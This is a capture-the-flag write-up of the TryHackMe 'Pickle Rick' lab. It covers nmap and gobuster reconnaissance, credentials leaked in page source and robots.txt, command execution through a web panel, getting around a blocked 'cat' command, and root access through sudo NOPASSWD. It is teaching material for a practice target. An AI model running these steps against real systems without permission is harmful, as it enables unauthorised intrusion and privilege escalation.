← back to writeups
platform TryHackMe
difficulty Easy

---

Pickle Rick is an Easy Linux CTF themed around Rick and Morty. Three ingredients are hidden across the machine. The credentials needed to enter the web command panel are sitting in plain sight in the page source and robots.txt — a reminder that attackers read everything before they touch a login form. Once inside, the privilege escalation is as simple as checking what the web user is allowed to run as root.

Reconnaissance

kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV $TARGET_IP

Starting Nmap 7.94 ( https://nmap.org ) at 2026-08-14 19:45 UTC
Nmap scan report for $TARGET_IP
Host is up (0.033s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 47:f6:46:6d:69:66:b6:b9:16:af:1b:1d:cd:1a:6f:03 (RSA)
|   256 54:f8:83:a9:0c:98:24:c2:f0:55:53:59:e5:7b:d0:1f (ECDSA)
|_  256 ec:bc:a3:e7:d9:77:0e:35:db:8e:6c:bc:80:80:7e:c2 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Rick is sup4r cool
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap done: 1 IP address (1 host up) scanned in 8.12 seconds

Port 80 is the attack surface. Before touching the login form, read everything the web server exposes: the page source and robots.txt.

kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://$TARGET_IP -w /usr/share/wordlists/dirb/common.txt -x php

===============================================================
Gobuster v3.6
===============================================================
[+] Url:        http://$TARGET_IP
[+] Wordlist:   /usr/share/wordlists/dirb/common.txt
[+] Extensions: php
[+] Status codes: 200,204,301,302,307,401,403
===============================================================
/assets               (Status: 301)
/index.html           (Status: 200)
/login.php            (Status: 200)
/robots.txt           (Status: 200)
/server-status        (Status: 403)
===============================================================

login.php is the entry point. Both robots.txt and the page source need to be checked first.

Credential Discovery

Username — HTML source:
kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ curl -s http://$TARGET_IP | grep -i "<!--"

  <!--

    Note to self, remember username!

    Username: R1ckRul3s

  -->
Password — robots.txt:
kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ curl http://$TARGET_IP/robots.txt

Wubbalubbadubdub

Credentials: R1ckRul3s / Wubbalubbadubdub

robots.txt is a public file that tells search crawlers what not to index. In real engagements it is one of the first places to check — it regularly exposes staging paths, backup directories, admin panels, and occasionally credentials left by mistake.

Initial Access — Web Command Panel

Log in at http://$TARGET_IP/login.php. The application presents a command panel that passes input to a shell and returns the output in the browser — this is Remote Code Execution (RCE) running as www-data.

Enter Command $ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Enter Command $ uname -a
Linux ip-$TARGET_IP 4.4.0-1075-aws #85-Ubuntu SMP Thu Jan 17 00:16:26 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

Enter Command $ pwd
/var/www/html

Note: cat is blocked by the application. Use less, strings, or more as substitutes — they read file content through different system calls, bypassing a naive filter on the word cat.

Ingredient 1

Enter Command $ ls -la
total 40
drwxr-xr-x 3 root   root   4096 Feb 10  2019 .
drwxr-xr-x 3 root   root   4096 Feb 10  2019 ..
-rwxr-xr-x 1 ubuntu ubuntu  882 Feb 10  2019 Sup3rS3cretPickl3Ingred.txt
-rwxr-xr-x 1 ubuntu ubuntu   17 Feb 10  2019 assets
-rwxr-xr-x 1 root   root    742 Feb 10  2019 clue.txt
-rwxr-xr-x 1 root   root   1105 Feb 10  2019 denied.php
-rwxrwxrwx 1 root   root   1062 Feb 10  2019 index.html
-rwxr-xr-x 1 root   root   1438 Feb 10  2019 login.php
-rwxr-xr-x 1 root   root   2044 Feb 10  2019 portal.php
-rwxr-xr-x 1 root   root     17 Feb 10  2019 robots.txt

Enter Command $ less Sup3rS3cretPickl3Ingred.txt
$INGREDIENT_1

clue.txt points toward the next ingredient:

Enter Command $ less clue.txt
Look around the file system for the other ingredient.

Ingredient 2

Enter Command $ ls /home
rick  ubuntu

Enter Command $ ls -la /home/rick
total 12
drwxrwxrwx 2 root root 4096 Feb 10  2019 .
drwxr-xr-x 4 root root 4096 Feb 10  2019 ..
-rwxrwxrwx 1 root root   13 Feb 10  2019 second ingredients

Enter Command $ less /home/rick/second\ ingredients
$INGREDIENT_2

Privilege Escalation

Before trying any exploit, check what the current user is allowed to run with elevated privileges. sudo -l is the first command for Linux privilege escalation:

Enter Command $ sudo -l
Matching Defaults entries for www-data on ip-$TARGET_IP:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ip-$TARGET_IP:
    (ALL) NOPASSWD: ALL

www-data — a web-facing process user — is allowed to run any command as root with no password. NOPASSWD: ALL is the highest possible misconfiguration: any web vulnerability that gives code execution on this server immediately yields full root access with zero extra steps.

Enter Command $ sudo ls /root
3rd.txt  snap

Enter Command $ sudo less /root/3rd.txt
$INGREDIENT_3

Key Takeaways

  • Always read the page source. Developer comments leak usernames, API keys, environment references, and version strings. Attackers check this before anything else.
  • robots.txt is a public file — it tells search crawlers what not to index while simultaneously advertising those exact paths to attackers. Check it immediately.
  • If cat is blocked, use less, strings, more, or tac. A filter blocking one command name never blocks all ways to read a file.
  • sudo -l is always the first privilege escalation check on Linux. NOPASSWD: ALL on a web service account means any RCE on the web layer gives root instantly — no further exploitation needed.
  • Save full command outputs during the machine. Partial output is not evidence — if you need to prove or replicate a finding, you need the complete response, not just what you noticed at the time.

References